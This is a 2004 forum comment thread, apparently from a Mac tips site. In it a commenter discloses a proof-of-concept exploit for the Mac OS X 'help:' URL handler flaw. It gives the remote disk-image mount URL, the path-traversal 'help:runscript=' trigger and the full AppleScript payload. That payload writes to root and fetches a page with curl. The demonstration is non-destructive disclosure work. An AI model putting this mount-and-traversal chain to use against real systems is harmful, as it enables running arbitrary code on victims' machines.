Submit Hint Search The Forums LinksStatsPollsHeadlinesRSS
14,000 hints and counting!


Click here to return to the 'How to avoid the new 'Help' URL handler vulnerability' hint
The following comments are owned by whoever posted them. This site is not responsible for what they say.
How to avoid the new 'Help' URL handler vulnerability
Authored by: anjoschu on May 20, '04 08:18:08AM

I would like to chime in that modifying OpnApp.scpt does _not_ suffice.

I have created an exploit that demonstrates just that:

http://www.schuderer.net/pub/secflaw.html

This exploit does not rely on OpnApp.scpt, but brings its own script.

After a few seconds, the left frame mounts a disk image on your machine using a meta refresh with this URL:
disk://schuderer.net/pub/dmgtest.dmg

A few seconds after the disk image has been mounted (up to 20), an applescript contained in that disk image will launch.

It tests whether it can create the file sometestfile.txt in your root "/" directory (not if you're probably not an Admin) and whether it can download a html page to your home directory (most probably so), then displays a dialog box with the results.

The script doesn't do anything else.

The meta refresh URL that is used is help:runscript=../../../Volumes/dmgtest/testme.scpt



[ Reply to This | # ]
Disclaimer: Try this at your own risk.
Authored by: anjoschu on May 20, '04 09:09:20AM
Don't be alarmed, I just wanted to make clear that everyone who tries out my exploit does so at his/her own risk. The exploit is designed to be absolutely non-destructive, but who knows what may happen on different systems.

Don't try this if you already have files called /sometestfile.txt and ~/sometestfile.html containing something important. They will not be overwritten, but data will be appended to them, which hypothetically can render them unusable.

If you would like to take a peek into the applescript with scripteditor before trying the exploit to make sure it won't harm your system, the disk image is situated here:

http://www.schuderer.net/pub/dmgtest.dmg
(MD5 (dmgtest.dmg) = f8aa896d52b746b525063c3f8ce29308)

Here is the code of the contained script testme.scpt:


try
	do shell script "echo In my opinion, working under an Administrator account is an unneccessary risk >> /sometestfile.txt"
	set verdict to "you're working as an Admin. That's very bad. I've been able to create
        the file 'sometestfile.txt' in the root directory of your hard drive. If I were feeling malicious, 
        I could install myself in the StartupItems, delete important system files or do almost anything
        else I wanted.
	
"
on error
	set verdict to "you're not working as an Admin. Thus my little plot to create a file in
       the root directory of your hard drive has failed. That's comforting. A little.
	
"
end try

try
	do shell script "curl http://www.heise.de >> ~/sometestfile.html"
	set curlresult to "I was able to download the entry page of a popular German IT news site
          to 'sometestfile.html' in your Home directory. This is just to demonstrate the power of
          a script like this one."
on error
	set curlresult to "Surprisingly I was unable to download some internet site to 'sometestfile.html'
         in your Home directory. Do you happen to have a third-party firewall installed or
          restricted permissions? A good idea if so."
end try

display dialog "Hello, I am (mostly) harmless.

This is a script from a disk image that has been mounted remotely via the URL
  disk://schuderer.net/pub/dmgtest.dmg.
This script  has been launched via the URL
  help:runscript=../../../Volumes/dmgtest/testme.scpt
  
I've noticed that " & verdict & curlresult buttons {"Ooh, I'm scared!"}

Paranoia galore! :)

[ Reply to This | # ]